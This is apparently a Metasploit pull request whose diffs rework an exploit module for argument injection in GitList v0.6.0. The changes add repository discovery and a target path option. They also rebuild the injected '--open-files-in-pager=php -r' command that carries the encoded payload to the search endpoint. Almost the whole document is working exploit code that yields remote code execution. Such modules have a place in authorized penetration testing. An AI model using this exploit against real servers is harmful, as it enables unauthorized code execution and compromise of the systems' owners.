### PR TITLE
Remove double eval for Gitlist Argument Injection exploit module #10262

### DIFF
--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -37,10 +37,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        => { 'BadChars' => '\'' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Default path to GitList', '/'])
+    ])
+
   end
 
   def check
-    uri = normalize_uri(target_uri.path, '/gitlist/')
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi(
       'method'  => 'GET',
       'uri'     => uri
@@ -53,8 +59,41 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
+  def get_repo
+    repo_res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    )
+
+    if repo_res && repo_res.code == 200
+      repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten
+      fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty?
+      return repos.detect{ |r| r if has_files?(r) }
+    else
+      fail_with(Failure::Unreachable, "Could not access GitList")
+    end
+  end
+
+  def has_files?(repo)
+    res = send_request_cgi(
+    'method' => 'GET',
+    'uri'    => normalize_uri(target_uri.path, repo, '/')
+    )
+    if res && res.code == 200
+     print_good("Successfully accessed repo #{repo}")
+     return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty?
+
+     return true
+    else
+      fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo")
+    end
+  end
+
   def exploit
-    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+    repo = get_repo
+    fail_with(Failure::Unreachable, "No files found in repos") if repo.nil?
+
+    postUri = normalize_uri(target_uri.path, repo << '/tree/c/search')
     cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
     send_request_cgi(
       'method' => 'POST',

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'GitList v0.6.0', { } ]
         ],
       'Privileged'     => false,
-      'Payload'        => { 'BadChars' => '\'"' },
+      'Payload'        => { 'BadChars' => '\'' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
   end
@@ -55,9 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "eval(\\"'
+    cmd = '--open-files-in-pager=php -r "'
     cmd << payload.encoded
-    cmd << '\\");"'
+    cmd << ';"'
     send_request_cgi(
       'method' => 'POST',
       'uri'    => postUri,

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -55,9 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "'
-    cmd << payload.encoded
-    cmd << ';"'
+    cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
     send_request_cgi(
       'method' => 'POST',
       'uri'    => postUri,


### PR DESCRIPTION
Removed eval function from exploit and modified badchars. Original PR #10262

